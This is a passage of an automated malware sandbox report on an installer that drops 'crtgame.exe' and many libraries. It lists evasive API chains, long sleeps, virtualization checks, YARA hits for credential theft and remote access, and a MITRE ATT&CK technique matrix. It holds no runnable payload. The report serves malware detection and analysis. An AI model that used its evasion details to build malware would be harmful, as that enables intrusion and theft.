                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-DG85B.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-IM6II.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libmp4v2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsox-3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\is-785C0.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libsoxr.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UN741.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-HP7BQ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-O51E5.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-5QDBA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-8JJ67.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-I5CC7.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-FBHNA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-930UV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-E5NVS.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-D10RQ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-GSGD0.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-JISVL.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-LVBK5.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-EATSP.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_isdecmp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-J0EI4.tmp\_isetup\_RegDLL.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-6S6NV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-I1OEI.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-4CPU3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-JU8A8.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-SJ07E.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-LP9D8.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-QQL7E.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-DTLCM.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-KU7UG.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RGK44.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PJ2FQ.tmpJump to dropped file
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5694
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_7-16392
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6304Thread sleep count: 2634 > 30Jump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6304Thread sleep time: -5268000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 4536Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6304Thread sleep count: 7327 > 30Jump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 6304Thread sleep time: -14654000s >= -30000sJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_004520C0 FindFirstFileA,GetLastError,1_2_004520C0
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,1_2_00473F08
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00496568
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463404
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463880
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose,1_2_00461E78
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B30
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeThread delayed: delay time: 60000Jump to behavior
                  Source: crtgame.exe, 00000007.00000002.3299995322.0000000000948000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: crtgame.exe, 00000007.00000002.3299995322.00000000008C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: crtgame.exe, 00000007.00000002.3299995322.0000000000948000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeAPI call chain: ExitProcess graph end nodegraph_0-6734
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeAPI call chain: ExitProcess graph end nodegraph_5-2853
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeAPI call chain: ExitProcess graph end nodegraph_5-2860
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeAPI call chain: ExitProcess graph end nodegraph_7-16394
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C5FBBE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,7_2_02C5FBBE
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C5FBBE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,7_2_02C5FBBE
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,1_2_0044C030
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C45F14 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,GetTickCount,_memset,wsprintfA,_memset,_memset,_memset,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,_memset,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,_memset,_memset,_memset,_malloc,_memset,_strtok,_swscanf,_strtok,Sleep,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_memset,7_2_02C45F14
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C58F28 SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_02C58F28
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00476FAC ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,1_2_00476FAC
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0042DFC4 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,1_2_0042DFC4
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C57A6D cpuid 7_2_02C57A6D
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: GetLocaleInfoA,0_2_004051FC
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: GetLocaleInfoA,0_2_00405248
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: GetLocaleInfoA,1_2_00408570
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: GetLocaleInfoA,1_2_004085BC
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00457CE8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_00457CE8
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00454AB8 GetUserNameA,1_2_00454AB8
                  Source: C:\Users\user\Desktop\AGcC2uK0El.exeCode function: 0_2_00405CE4 GetVersionExA,0_2_00405CE4

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-M07BP.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-930UV.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-6ND5B.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-JORH4.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-PJ8MN.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-ULG4P.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-IM6II.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-EATSP.tmp, type: DROPPED
                  Source: Yara matchFile source: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3300804778.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: crtgame.exe PID: 7156, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-M07BP.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-930UV.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-6ND5B.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-JORH4.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-PJ8MN.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-ULG4P.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-IM6II.tmp, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\CRTGame\bin\x86\is-EATSP.tmp, type: DROPPED
                  Source: Yara matchFile source: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3300804778.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: crtgame.exe PID: 7156, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                  Native API
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  1
                  Deobfuscate/Decode Files or Information
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job
                  4
                  Windows Service
                  1
                  DLL Side-Loading
                  3
                  Obfuscated Files or Information
                  LSASS Memory1
                  Account Discovery
                  Remote Desktop ProtocolData from Removable Media2
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  Service Execution
                  1
                  Scheduled Task/Job
                  1
                  Access Token Manipulation
                  23
                  Software Packing
                  Security Account Manager1
                  File and Directory Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Bootkit
                  4
                  Windows Service
                  1
                  DLL Side-Loading
                  NTDS35
                  System Information Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                  Process Injection
                  1
                  Masquerading
                  LSA Secrets41
                  Security Software Discovery
                  SSHKeylogging112
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                  Scheduled Task/Job
                  21
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials21
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Access Token Manipulation
                  DCSync11
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                  Process Injection
                  Proc Filesystem3
                  System Owner/User Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Bootkit
                  /etc/passwd and /etc/shadow1
                  Remote System Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
